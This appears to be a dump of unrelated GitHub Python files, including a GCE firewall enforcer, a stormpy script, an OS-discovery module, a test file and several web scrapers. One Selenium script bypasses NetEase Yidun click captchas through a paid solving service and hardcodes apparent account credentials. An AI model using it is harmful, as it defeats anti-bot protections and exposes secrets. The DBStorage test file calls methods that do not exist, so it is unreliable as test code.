rules = json.loads(json_rules)\n if isinstance(rules, list):\n for rule in rules:\n self.add_rule(rule)\n\n elif isinstance(rules, dict):\n if 'items' in rules:\n for item in rules['items']:\n rule = dict([(key, item[key]) for key in ALLOWED_RULE_ITEMS\n if key in item])\n self.add_rule(rule)\n\n def _order_lists_in_rule(self, unsorted_rule):\n \"\"\"Recursively iterates a rule dictionary and sorts any lists.\n\n This ensures that two rule with the same polices, but with unordered\n lists will compare equal when tested.\n\n Args:\n unsorted_rule: A rule dictionary that has not been sorted.\n\n Returns:\n A new rule dictionary with the lists sorted\n \"\"\"\n sorted_rule = {}\n for key, value in unsorted_rule.items():\n if isinstance(value, list):\n if value and isinstance(value[0], dict): # List of dictionaries\n for i, entry in enumerate(value):\n value[i] = self._order_lists_in_rule(entry)\n\n sorted_rule[key] = sorted(value)\n elif isinstance(value, dict):\n sorted_rule[key] = self._order_lists_in_rule(value)\n else:\n sorted_rule[key] = value\n return sorted_rule\n\n def _check_rule_before_adding(self, rule):\n \"\"\"Validates that a rule is valid and not a duplicate.\n\n Validation is based on reference:\n https://cloud.google.com/compute/docs/reference/latest/firewalls/insert\n\n Args:\n rule: The rule to validate.\n\n Returns:\n True if rule is valid.\n\n Raises:\n DuplicateFirewallRuleNameError: Two or more rules have the same name.\n InvalidFirewallRuleError: One or more rules failed validation.\n \"\"\"\n unknown_keys = set(rule.keys()) - ALLOWED_RULE_ITEMS\n if unknown_keys:\n # This is probably the result of a API version upgrade that didn't\n # properly update this function (or a broken binary).\n raise InvalidFirewallRuleError(\n 'An unexpected entry exists in a firewall rule dict: \"%s\".' %\n ','.join(list(unknown_keys)))\n\n for key in ['allowed', 'name', 'network']:\n if key not in rule:\n raise InvalidFirewallRuleError(\n 'Rule missing required field \"%s\": \"%s\".' % (key, rule))\n\n if 'sourceRanges' not in rule and 'sourceTags' not in rule:\n raise InvalidFirewallRuleError(\n 'Rule missing required field oneof \"sourceRanges\" or '\n '\"sourceTags\": \"%s\".' 
% rule)\n\n for allow in rule['allowed']:\n if 'IPProtocol' not in allow:\n raise InvalidFirewallRuleError(\n 'Allow rule in %s missing required field '\n '\"IPProtocol\": \"%s\".'\n % (rule['name'], allow))\n\n if len(rule['name']) > 63:\n raise InvalidFirewallRuleError(\n 'Rule name exceeds length limit of 63 chars: \"%s\".' %\n rule['name'])\n\n # TODO: Verify rule name matches regex of allowed\n # names from reference\n\n if rule['name'] in self.rules:\n raise DuplicateFirewallRuleNameError(\n 'Rule %s already defined in rules: %s' %\n (rule['name'], ', '.join(sorted(self.rules.keys()))))\n\n return True\n\n# pylint: disable=too-many-instance-attributes\n# TODO: Investigate improving so we can avoid the pylint disable.\nclass FirewallEnforcer(object):\n \"\"\"Enforce a set of firewall rules for use with GCE projects.\"\"\"\n\n def __init__(self,\n project,\n firewall_api,\n expected_rules,\n current_rules=None,\n project_sema=None,\n operation_sema=None):\n \"\"\"Constructor.\n\n Args:\n project: The id of the cloud project to enforce the firewall on.\n firewall_api: A ComputeFirewallAPI instance for interfacing with GCE\n API.\n expected_rules: A FirewallRules object with the expected rules to be\n enforced on the project.\n current_rules: A FirewallRules object with the current rules for the\n project. If not defined, the API will be queried and the existing\n rules imported into current_rules when apply_firewall is called\n for the project.\n project_sema: An optional semaphore object, used to limit the number\n of concurrent projects getting written to.\n operation_sema: An optional semaphore object, used to limit the number\n of concurrent write operations on project firewalls.\n \"\"\"\n self.project = project\n self.firewall_api = firewall_api\n self.expected_rules = expected_rules\n\n if current_rules:\n self.current_rules = current_rules\n else:\n self.current_rules = None\n\n self.project_sema = project_sema\n self.operation_sema = operation_sema\n\n # Initialize private parameters\n self._rules_to_delete = []\n self._rules_to_insert = []\n self._rules_to_update = []\n\n self._deleted_rules = []\n self._inserted_rules = []\n self._updated_rules = []\n\n def apply_firewall(self,\n prechange_callback=None,\n networks=None,\n allow_empty_ruleset=False):\n \"\"\"Enforce the expected firewall rules on the project.\n\n Args:\n prechange_callback: An optional callback function that will get called\n if the firewall policy for a project does not match the expected\n policy, before any changes are actually applied. If the callback\n returns False then no changes will be made to the project. If it\n returns True then the changes will be pushed. If\n prechange_callback is set to None then the callback will be\n skipped and enforcement will continue as though it had returned\n True.\n\n The callback template is callback_func(project,\n rules_to_delete,\n rules_to_insert,\n rules_to_update)\n\n The callback may be used to limit the kinds of firewall changes\n that are allowed to be pushed for a project, limit the number of\n rules that can get changed, to check if the project should have\n rules changed, etc.\n\n The callback may also raise FirewallEnforcementFailedError if it\n determines that the set of changes to the policy could result in\n an outage for an underlying service, or otherwise are inconsistent\n with business rules. This will cause the enforcement to fail.\n\n networks: A list of networks to limit rule changes to. 
Rules on\n networks not in the list will not be changed.\n\n Note- This can lead to duplicate rule name collisions since all\n rules are not included when building the change set. The\n change set will be validated before getting enforced and any\n errors will cause a FirewallEnforcementFailedError exception\n to be raised.\n\n allow_empty_ruleset: If set to true and expected_rules has no rules,\n all current firewall rules will be deleted from the project.\n\n Returns:\n The total number of firewall rules deleted, inserted and updated.\n\n Raises:\n FirewallEnforcementFailedError: An error occurred while updating the\n firewall. The calling code should validate the current state of\n the project firewall, and potentially revert to the old firewall\n rules.\n\n Any rules changed before the error occured can be retrieved by\n calling the Get(Deleted|Inserted|Updated)Rules methods.\n \"\"\"\n # Reset change sets to empty lists\n self._rules_to_delete = []\n self._rules_to_insert = []\n self._rules_to_update = []\n\n if not self.current_rules:\n self.refresh_current_rules()\n\n if not self.expected_rules.rules and not allow_empty_ruleset:\n raise FirewallEnforcementFailedError(\n 'No rules defined in the expected rules.')\n\n # Check if current rules match expected rules, so no changes are needed\n if networks:\n if (self.current_rules.filtered_by_networks(networks) ==\n self.expected_rules.filtered_by_networks(networks)):\n LOGGER.info(\n 'Current and expected rules match for project %s on '\n 'network(s) \"%s\".', self.project, ','.join(networks))\n return 0\n elif self.current_rules == self.expected_rules:\n LOGGER.info('Current and expected rules match for project %s.',\n self.project)\n return 0\n\n self._build_change_set(networks)\n self._validate_change_set(networks)\n\n if self.project_sema:\n self.project_sema.acquire()\n\n try:\n if prechange_callback:\n if not prechange_callback(self.project, self._rules_to_delete,\n self._rules_to_insert,\n self._rules_to_update):\n LOGGER.warn(\n 'The callback returned False for project %s, changes '\n 'will not be applied.', self.project)\n return 0\n changed_count = self._apply_change_set()\n finally:\n if self.project_sema:\n self.project_sema.release()\n\n return changed_count\n\n def refresh_current_rules(self):\n \"\"\"Updates the current rules for the project using the compute API.\"\"\"\n current_rules = FirewallRules(self.project)\n current_rules.add_rules_from_api(self.firewall_api)\n\n self.current_rules = current_rules\n\n def get_deleted_rules(self):\n \"\"\"Returns the list of deleted rules.\"\"\"\n return self._deleted_rules\n\n def get_inserted_rules(self):\n \"\"\"Returns the list of inserted rules.\"\"\"\n return self._inserted_rules\n\n def get_updated_rules(self):\n \"\"\"Returns the list of updated rules.\"\"\"\n return self._updated_rules\n\n def _build_change_set(self, networks=None):\n \"\"\"Enumerate changes between the current and expected firewall rules.\"\"\"\n if networks:\n # Build new firewall rules objects from the subset of rules for\n # networks\n current_rules = self.current_rules.filtered_by_networks(networks)\n expected_rules = self.expected_rules.filtered_by_networks(networks)\n else:\n current_rules = self.current_rules.rules\n expected_rules = self.expected_rules.rules\n\n for rule_name in current_rules:\n if rule_name not in expected_rules:\n self._rules_to_delete.append(rule_name)\n\n for rule_name in expected_rules:\n if rule_name not in current_rules:\n self._rules_to_insert.append(rule_name)\n\n for 
rule_name in expected_rules:\n            if rule_name in current_rules:\n                if expected_rules[rule_name] != current_rules[rule_name]:\n                    self._rules_to_update.append(rule_name)\n\n    def _validate_change_set(self, networks=None):\n        \"\"\"Validate the changeset will not leave the project in a bad state.\"\"\"\n        for rule_name in self._rules_to_insert:\n            if (rule_name in self.current_rules.rules and\n                    rule_name not in self._rules_to_delete):\n                raise FirewallEnforcementFailedError(\n                    'The rule %s is in the rules to insert set, but the same '\n                    'rule name already exists on project %s. It may be used on'\n                    ' a different network.' % (rule_name, self.project))\n\n        if networks:\n            for rule_name in self._rules_to_update:\n                impacted_network = get_network_name_from_url(\n                    self.current_rules.rules[rule_name]['network'])\n                if impacted_network not in networks:\n                    raise FirewallEnforcementFailedError(\n                        'The rule %s is in the rules to update set, but it is '\n                        'currently on a network, \"%s\", that is not in the '\n                        'allowed networks list for project %s: \"%s\". Updating '\n                        'the rule to %s would impact the wrong network.' %\n                        (rule_name, impacted_network, self.project,\n                         ', '.join(networks),\n                         self.expected_rules.rules[rule_name]))\n\n    def _apply_change_set(self):\n        \"\"\"Updates project firewall rules based on the generated changeset.\n\n        Extends self._(deleted|inserted|updated)_rules with the rules changed by\n        these operations.\n\n        Returns:\n            The total number of firewall rules deleted, inserted and updated.\n\n        Raises:\n            FirewallEnforcementFailedError: Raised if one or more changes fails.\n        \"\"\"\n        change_count = 0\n\n        if self._rules_to_insert:\n            LOGGER.info('Inserting rules: %s', ', '.join(self._rules_to_insert))\n            rules = [\n                self.expected_rules.rules[rule_name]\n                for rule_name in self._rules_to_insert\n            ]\n            insert_function = self.firewall_api.insert_firewall_rule\n            (successes, failures, change_errors) = self._apply_change(\n                insert_function, rules)\n            self._inserted_rules.extend(successes)\n            change_count += len(successes)\n            if failures:\n                raise FirewallEnforcementFailedError(\n                    'Firewall enforcement failed while inserting new rules for'\n                    ' project %s. The following rules had failures: '\n                    '%s\\nErrors: %s' %\n                    (self.project, json.dumps(failures), str(change_errors)))\n\n        if self._rules_to_delete:\n            LOGGER.info('Deleting rules: %s', ', '.join(self._rules_to_delete))\n            rules = [\n                self.current_rules.rules[rule_name]\n                for rule_name in self._rules_to_delete\n            ]\n            delete_function = self.firewall_api.delete_firewall_rule\n            (successes, failures, change_errors) = self._apply_change(\n                delete_function, rules)\n            self._deleted_rules.extend(successes)\n            change_count += len(successes)\n            if failures:\n                raise FirewallEnforcementFailedError(\n                    'Firewall enforcement failed while deleting current rules '\n                    'for project %s. The following rules had failures: '\n                    '%s\\nErrors: %s'\n                    % (self.project, json.dumps(failures), str(change_errors)))\n\n        if self._rules_to_update:\n            LOGGER.info('Updating rules: %s', ', '.join(self._rules_to_update))\n            rules = [\n                self.expected_rules.rules[rule_name]\n                for rule_name in self._rules_to_update\n            ]\n            update_function = self.firewall_api.update_firewall_rule\n            (successes, failures, change_errors) = self._apply_change(\n                update_function, rules)\n            self._updated_rules.extend(successes)\n            change_count += len(successes)\n            if failures:\n                raise FirewallEnforcementFailedError(\n                    'Firewall enforcement failed while updating rules for '\n                    'project %s. 
The following rules had failures: %s\\nErrors:'\n ' %s' %\n (self.project, json.dumps(failures), change_errors))\n\n return change_count\n\n # pylint: disable=too-many-statements,too-many-branches,too-many-locals\n # TODO: Look at not having some of these disables.\n def _apply_change(self, firewall_function, rules):\n \"\"\"Modify the firewall using the passed in function and rules.\n\n If self.operation_sema is defined, then the number of outstanding\n changes is limited to the number of semaphore locks that can be\n acquired.\n\n Args:\n firewall_function: The delete|insert|update function to call for this\n set of rules\n rules: A list of rules to pass to the firewall_function.\n\n Returns:\n A tuple with the rules successfully changed by this function and the\n rules that failed.\n \"\"\"\n applied_rules = []\n failed_rules = []\n change_errors = []\n if not rules:\n return (applied_rules, failed_rules, change_errors)\n\n successes = []\n failures = []\n running_operations = []\n finished_operations = []\n operations = {}\n for rule in rules:\n if self.operation_sema:\n if not self.operation_sema.acquire(False): # Non-blocking\n # No semaphore available, wait for one or more ops to\n # complete.\n if running_operations:\n (completed, running_operations) = (\n self.firewall_api.wait_for_any_to_complete(\n self.project, running_operations,\n OPERATION_TIMEOUT))\n finished_operations.extend(completed)\n for response in completed:\n self.operation_sema.release()\n\n self.operation_sema.acquire(True) # Blocking\n\n try:\n response = firewall_function(self.project, rule)\n except errors.HttpError as e:\n LOGGER.error(\n 'Error changing firewall rule %s for project %s: %s',\n rule.get('name', ''), self.project, e)\n error_str = 'Rule: %s\\nError: %s' % (rule, e)\n change_errors.append(error_str)\n failed_rules.append(rule)\n if self.operation_sema:\n self.operation_sema.release()\n continue\n\n if 'name' in response:\n operations[response['name']] = rule\n running_operations.append(response)\n else:\n LOGGER.error('The response object returned by %r(%s, %s) is '\n 'invalid. 
It does not contain a \"name\" key: %s',\n firewall_function, self.project,\n json.dumps(rule), json.dumps(response))\n failed_rules.append(rule)\n if self.operation_sema:\n self.operation_sema.release()\n\n responses = self.firewall_api.wait_for_all_to_complete(\n self.project, running_operations, OPERATION_TIMEOUT)\n finished_operations.extend(responses)\n\n if self.operation_sema:\n for response in responses:\n self.operation_sema.release()\n\n for response in finished_operations:\n if self.firewall_api.is_successful(response):\n successes.append(response)\n else:\n failures.append(response)\n\n for result in successes:\n operation_name = result.get('name', '')\n if operation_name in operations:\n applied_rules.append(operations[operation_name])\n else:\n LOGGER.warn(\n 'Successful result contained an unknown operation name, '\n '\"%s\": %s', operation_name, json.dumps(result))\n\n for result in failures:\n operation_name = result.get('name', '')\n if operation_name in operations:\n LOGGER.error(\n 'The firewall rule %s for project %s received the '\n 'following error response during the last operation: %s',\n operations[operation_name], self.project,\n json.dumps(result))\n failed_rules.append(operations[operation_name])\n else:\n LOGGER.warn(\n 'Failure result contained an unknown operation name, '\n '\"%s\": %s', operation_name, json.dumps(result))\n\n return (applied_rules, failed_rules, change_errors)\n","repo_name":"joshiumang107/forseti-security","sub_path":"google/cloud/security/enforcer/gce_firewall_enforcer.py","file_name":"gce_firewall_enforcer.py","file_ext":"py","file_size_in_byte":42939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37279914921","text":"import stormpy\n\n# Set the environment\nenvironment = stormpy.Environment()\n# environment.solver_environment.set_linear_equation_solver_type(stormpy.EquationSolverType.native)\n# ^ uncomment this to see the difference\n\n# Parse program\nprism_program = stormpy.parse_prism_program(\"dtmc.templ\")\ndtmc = stormpy.build_model(prism_program)\n\n# Parse properties\nproperties = stormpy.parse_properties('LRA=? 
[ \"goal\"]')\nprop = properties[0]\nresult = stormpy.model_checking(dtmc, prop, environment=environment)\nprint(result.at(0))\n","repo_name":"AntoninJarolim/dtmc_deadlock","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73899956627","text":"import logging\nimport os, sys, platform, subprocess\nfrom agent.lib.modulebasecontroller import ModuleBaseController\n\nLOG = logging.getLogger(\"module\")\n\nclass DiscoverOs(ModuleBaseController):\n\n def __init__(self):\n ModuleBaseController.__init__(self)\n\n def index(self):\n return 'Inside TestService MyController index ' + os.getcwd()\n\n def getOsInfo(self):\n osPlatform = platform.platform().upper()\n if osPlatform.find(\"ESX\") > 0:\n modulename = 'discoveros.discover_os_info_esx'\n __import__(modulename)\n module = sys.modules[modulename]\n return module.print_output()\n else:\n cmd = 'sudo dmidecode -s system-manufacturer'\n proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n strOsType = proc.communicate()[0]\n if strOsType.find(\"VMware\") >= 0:\n modulename = 'discoveros.discover_os_info_vm'\n __import__(modulename)\n module = sys.modules[modulename]\n return module.print_output()\n else:\n modulename = 'discoveros.discover_os_info'\n __import__(modulename)\n module = sys.modules[modulename]\n return module.print_output()\n return 'Inside discoverService discoverService getOsInfo'\n\n\n\n\n","repo_name":"yubin154/cronusagentmodules","sub_path":"discoverosmodule/discoveros/discover_os.py","file_name":"discover_os.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28922528773","text":"#encode:utf-8\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver import ActionChains\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom chaojiying import Chaojiying_Client\r\nimport time\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\n\r\n\r\nclass Click_Capture():\r\n def __init__(self, un, pw, soft_id):\r\n self.un = un\r\n self.pw = pw\r\n self.soft_id = soft_id\r\n self.url = 'http://dun.163.com/trial/picture-click'\r\n option = self.set_start_option()\r\n self.driver = webdriver.Chrome(chrome_options=option)\r\n self.wait = WebDriverWait(self.driver, 10)\r\n\r\n def set_start_option(self):\r\n option = Options()\r\n option.add_argument('--window-size=1300,900')\r\n option.add_argument('--disable-infobars')\r\n # option.add_argument('--headless')\r\n return option\r\n def get_first_page(self):\r\n self.driver.get(self.url)\r\n self.driver.execute_script(\"window.scrollTo(0,200)\")\r\n capture_po = self.wait.until(EC.presence_of_element_located((By.XPATH,\r\n '//div[@data-type=\"click_float\"]//div[@class=\"yidun_tips\"]')))\r\n ActionChains(self.driver).move_to_element(capture_po).perform()\r\n\r\n def get_captcha_image(self):\r\n image_loc = self.wait.until(EC.visibility_of_element_located((By.XPATH,\r\n '//div[@data-type=\"click_float\"]//*[@class=\"yidun_bg-img\"]'))).location\r\n print(image_loc)\r\n image = BytesIO(self.driver.get_screenshot_as_png())\r\n im = Image.open(image)\r\n # im.show()\r\n new_image = im.crop((image_loc['x'], 
image_loc['y']-200, image_loc['x']+400, image_loc['y']+70))\r\n        # new_image.show()\r\n        captcha = BytesIO()\r\n        new_image.save(captcha, format('png'))\r\n        return captcha.getvalue()\r\n\r\n\r\n    def post_captcha(self,captcha):\r\n        cjy = Chaojiying_Client(self.un, self.pw, self.soft_id)\r\n        result = cjy.PostPic(captcha, 9103).get('pic_str')\r\n        print(result)\r\n        position = [i.split(',')for i in result.split('|')]\r\n\r\n        return position\r\n    def click_words(self, position):\r\n        # TODO: still need to add a click trajectory.\r\n        im = self.wait.until(EC.visibility_of_element_located((By.XPATH,\r\n                        '//div[@data-type=\"click_float\"]//*[@class=\"yidun_bg-img\"]')))\r\n        for x, y in position:\r\n            print(x,y)\r\n            ActionChains(self.driver).move_to_element_with_offset(im, int(x), int(y)).perform()\r\n            ActionChains(self.driver).click().perform()\r\n\r\n    def run(self):\r\n        try:\r\n            self.get_first_page()\r\n            captcha = self.get_captcha_image()\r\n            position = self.post_captcha(captcha)\r\n            self.click_words(position)\r\n        finally:\r\n            # pass\r\n            time.sleep(5)\r\n\r\n            self.driver.quit()\r\n\r\nif __name__==\"__main__\":\r\n    yidun = Click_Capture('qq849885277', 'luoxuefeng520', '896547')\r\n    yidun.run()","repo_name":"luoxuefeng1995/WORK","sub_path":"click_captcha.py","file_name":"click_captcha.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12419408367","text":"import requests\nfrom bs4 import BeautifulSoup\n\nevery_game_log_link = []\n\n\n# returns the html code of the requested url\ndef get_url_content(url):\n    return requests.get(url).text\n\n\nif __name__ == '__main__':\n    count = 1\n    i = 2160\n    file_count = 1\n    while i <= 10000:\n        url = 'http://itikawa.com/kifdb/herodb.cgi?table=bg&view=M&sort=1&order=D&recpoint=' + str(i)\n\n        content = get_url_content(url)\n        soup = BeautifulSoup(content, \"html.parser\")\n        for a in soup.find_all('a', href=True):\n            if \"http://itikawa.com/bgrPHP/bg.php?\" in a['href']:\n                print(str(count) + \" - i:\"+str(i) + \") Found the URL:\", a['href'])\n                # every_game_log_link.append(a['href'])\n\n                file_dl = get_url_content(a['href'])\n                file_soup = BeautifulSoup(file_dl, \"html.parser\")\n                for a2 in file_soup.find_all('a', href=True):\n                    if \"/kifdb/bg/bin/\" in a2['href']:\n                        print(\"Found the File:\", a2['href'])\n                        file_url = a2['href'].replace(\"../\", \"http://itikawa.com/\")\n                        r = requests.get(file_url, allow_redirects=True)\n                        open(\"../protocol/gamefiles/\" + str(file_count) + \".txt\", 'wb').write(r.content)\n                        file_count += 1\n                count += 1\n        i += 10\n","repo_name":"Schlizohr/backgammon","sub_path":"helper/WebCrawler.py","file_name":"WebCrawler.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34594977438","text":"import unittest\nimport os.path\nfrom os import getenv\nfrom datetime import datetime\nfrom models.base_model import Base\nfrom models.amenity import Amenity\nfrom models.engine.db_storage import DBStorage\nfrom models.state import State\nfrom models import *\n\n\n@unittest.skipIf(os.getenv('HBNB_TYPE_STORAGE', 'fs') != 'db', \"db\")\nclass Test_DBStorage(unittest.TestCase):\n    \"\"\"\n    Test the file storage class\n    \"\"\"\n    @classmethod\n    def setUpClass(cls):\n        \"\"\"create a session\"\"\"\n        # close previous connexion to same database\n        storage._DBStorage__session.close()\n        cls.store = DBStorage()\n        test_args = {'updated_at': datetime(2017, 2, 12, 00, 31, 53, 331997),\n                     'id': \"0234\",\n                     'created_at': 
datetime(2017, 2, 12, 00, 31, 53, 331900),\n 'name': 'goof'}\n cls.model = Amenity(**test_args)\n cls.store.reload()\n cls.test_len = 0\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"\n Test teardown method\n \"\"\"\n cls.store._DBStorage__session.close()\n storage.reload()\n\n def test_all(self):\n \"\"\"\n Test all method\n \"\"\"\n l1 = len(storage.all('State'))\n state = State(name=\"State test all\")\n state.save()\n output = storage.all('State')\n self.assertEqual(len(output), l1 + 1)\n self.assertIn(state.id, output.keys())\n storage.delete(state)\n\n def test_new(self):\n \"\"\"\n Test new method\n \"\"\"\n # note: we cannot assume order of test is order written\n self.test_len = len(self.store.all())\n # self.assertEqual(len(self.store.all()), self.test_len)\n self.model.save()\n self.store.reload()\n self.assertEqual(len(self.store.all()), self.test_len + 1)\n a = Amenity(name=\"thing\")\n a.save()\n self.store.reload()\n self.assertEqual(len(self.store.all()), self.test_len + 2)\n\n storage.delete(model)\n storage.delete(a)\n\n def test_save(self):\n \"\"\"\n Test save method\n \"\"\"\n test_len = len(self.store.all())\n a = Amenity(name=\"another\")\n a.save()\n self.store.reload()\n self.assertEqual(len(self.store.all()), test_len + 1)\n b = State(name=\"california\")\n self.assertNotEqual(len(self.store.all()), test_len + 2)\n b.save()\n self.store.reload()\n self.assertEqual(len(self.store.all()), test_len + 2)\n\n storage.delete(a)\n storage.delete(b)\n\n def test_reload(self):\n \"\"\"\n Test reload method\n \"\"\"\n self.model.save()\n a = Amenity(name=\"different\")\n a.save()\n self.store.reload()\n for value in self.store.all().values():\n self.assertIsInstance(value.created_at, datetime)\n storage.delete(a)\n\n def test_get(self):\n \"\"\"\n Test get object retrieval\n \"\"\"\n a = self.get(self.model, cls=\"Amenity\", id=\"1234\")\n self.assertIs(type(a), dict)\n b = self.get(self.model, cls=None, id=\"1234\")\n self.assertIs(type(a), None)\n\n storage.delete(a)\n storage.delete(b)\n\n def test_count(self):\n \"\"\"\n Test count method\n \"\"\"\n a = self.count(cls=\"Amenity\")\n self.assertEqual(len(self.store.all(\"Amenity\")), a)\n b = self.count(cls=None)\n self.assertEqual(len(self.store.all()), b)\n\n storage.delete(a)\n storage.delete(b)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Cwalker924/AirBnB_clone_v3","sub_path":"tests/test_models/test_engine/test_db_storage.py","file_name":"test_db_storage.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73844002067","text":"import asyncio\n\nfrom aiogram import Bot, Dispatcher\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom objects import globals\n\nfrom databases import Database\nfrom sqlalchemy import MetaData, create_engine\n\nfrom json import dumps, loads\n\nfrom os.path import isfile\n\nfrom loguru import logger\n\nasync def main():\n\n if not isfile(r\"config.json\"):\n with open(r\"config.json\", \"w\") as add_cfg:\n add_cfg.write(dumps(\n {\n \"token\":\"\", \n \"db_host\":\"\", \n \"db_name\":\"\",\n \"db_user\":\"\", \n \"db_password\":\"\", \n \"db_port\":5432\n }, indent=4\n ))\n add_cfg.close()\n \n with open(r\"config.json\", \"r\", encoding=\"utf-8\") as load_cfg:\n globals.config = loads(load_cfg.read())\n \n logger.info(\"Configuration loaded!\")\n\n #Telegram API\n globals.bot = Bot(token=globals.config[\"token\"], parse_mode=\"html\")\n globals.dp = 
Dispatcher(globals.bot, storage=MemoryStorage())\n\n #Database\n globals.db = Database(\"sqlite:///../_db/HH.sqlite\")\n globals.metadata = MetaData()\n\n globals.db_engine = create_engine(str(globals.db.url))\n globals.metadata.create_all(globals.db_engine)\n\n bot_info = await globals.bot.get_me()\n logger.info(f\"Start bot @{bot_info.username}\")\n\n import commands\n\n await globals.dp.start_polling()\n\nif __name__ == \"__main__\":\n try:\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n except KeyboardInterrupt:pass","repo_name":"amtp1/HH_Local","sub_path":"bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19000684430","text":"from multiagent.scenarios.arch.commons import *\nfrom multiagent.scenarios.simple_reference_3 import Scenario as S\n\n\nclass Scenario(S):\n def make_world(self):\n world = World()\n # set any world properties first\n world.dim_c = 2\n num_agents = 4\n num_landmarks = 4\n world.collaborative = True\n\n world_definition(world, num_agents, num_landmarks)\n\n self.reset_world(world)\n return world\n","repo_name":"enikon/MACP","sub_path":"multiagent/scenarios/arch/simple_reference_4.py","file_name":"simple_reference_4.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42814162295","text":"from visual import *\n\nfrom Bone import Bone\n\nsize = 12\nheight = 0\nwidth = 10\nvertical = 1\nhorizontal = 20\n\n# Create a instance with your size\nosso = Bone()\n\n# Set configs\nosso.setSize(size)\nosso.setPos(width, height)\nosso.rotate(vertical, horizontal)\n\n# And generate\nosso.generate()\n\n# To help, create a redpoint of reference\nsphere(pos=vector(0, 0, -1),\n radius=1,\n color=color.red)\n","repo_name":"wictorChaves/BoneVPython","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"75075304784","text":"ENDPOINTS = [\n \"BCF\",\n \"LogBCF\",\n \"BP\",\n \"LogP\",\n \"MP\",\n \"VP\",\n \"LogVP\",\n \"WS\",\n \"AOH\",\n \"BioDeg\",\n \"RB\",\n \"ReadyBiodeg\",\n \"HL\",\n \"LogHL\",\n \"KM\",\n \"LogKM\",\n \"KOA\",\n \"Koc\",\n \"LogKoc\",\n \"RT\",\n \"pKa\",\n \"LogD\",\n \"CERAPP\",\n \"ER\",\n \"CoMPARA\",\n \"AR\",\n \"CATMoS\",\n \"AcuteTox\",\n]\nALL_ENDPOINTS_PARAMETIZED = [([endpoint]) for endpoint in ENDPOINTS]\nSAMPLE_OF_ENDPOINTS_TOGETHER = [\n ENDPOINTS[0],\n ENDPOINTS[5],\n ENDPOINTS[8],\n ENDPOINTS[10],\n ENDPOINTS[14],\n]\n","repo_name":"cabreratoxy/pyOPERA","sub_path":"tests/test_opera/test_helpers/test_parameters.py","file_name":"test_parameters.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15520335535","text":"import os\nfrom flask import Flask, jsonify, abort, make_response, request, url_for, render_template\nfrom content_based_q import preprocess, vectorize_similarity, vectorize_similarity2, get_recommendations_both, anime_df, anime_new\nfrom genre_recommender import get_genre_recommendations, data_scored\nfrom flask_cors import CORS\n\n\napp = Flask(__name__, static_folder=\"frontend/anime-ui/build\", static_url_path=\"/\")\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n@app.route('/') \ndef index():\n return 
app.send_static_file('index.html')\n\n@app.route('/recommender', methods=['GET', 'POST'])\ndef recommend():\n    try:\n        if request.method == 'POST':\n            anime = request.get_json()['anime'].lower().strip()\n            cos_sim1 = vectorize_similarity(anime_df['Synopsis'])\n            cos_sim2 = vectorize_similarity2(anime_df['soup'])\n            preds = get_recommendations_both(anime,cos_sim1,cos_sim2).values.tolist()\n            preds = {i:preds[i] for i in range(len(preds))}\n            return jsonify(preds) \n    except KeyError:\n        abort(404)\n\n@app.route('/recommender/genre', methods=['GET', 'POST'])\ndef recommend_genre():\n    if request.method == 'POST':\n        anime_genre = request.get_json()['genre']\n        print(\"worked\") # for debugging\n        \n        preds = get_genre_recommendations(anime_genre).tolist()\n        preds = {i:preds[i] for i in range(len(preds))}\n        return jsonify(preds)\n\n\n@app.errorhandler(404)\ndef not_found(error):\n    return make_response(jsonify({'error':'Anime not found (try their japanese/english names )'}), 404)\n    \n\n\nif __name__ == '__main__':\n    # app.run(debug=True) # development mode\n    app.run(host='0.0.0.0', debug=False, port=80) # production mode","repo_name":"Pydare/Anime-Recommender-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"42348829872","text":"import logging\nfrom http import HTTPStatus\n\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\n\ndef make_int(text: str):\n    text = text.replace(' ', '')\n    text = text.replace('₽', '')\n    text = text.replace('к', '')\n    return int(text)\n\n\ndef make_float(text: str):\n    text = text.replace(' ', '')\n    text = text.replace('₽', '')\n    text = text.replace('к', '')\n    return float(text)\n\n\ndef make_bool(text):\n    if text:\n        return True\n    return False\n\n\nparse_classes = [\n    {\n        'name': 'server',\n        'block': 'div',\n        'class': 'tc-server'\n    },\n    {\n        'name': 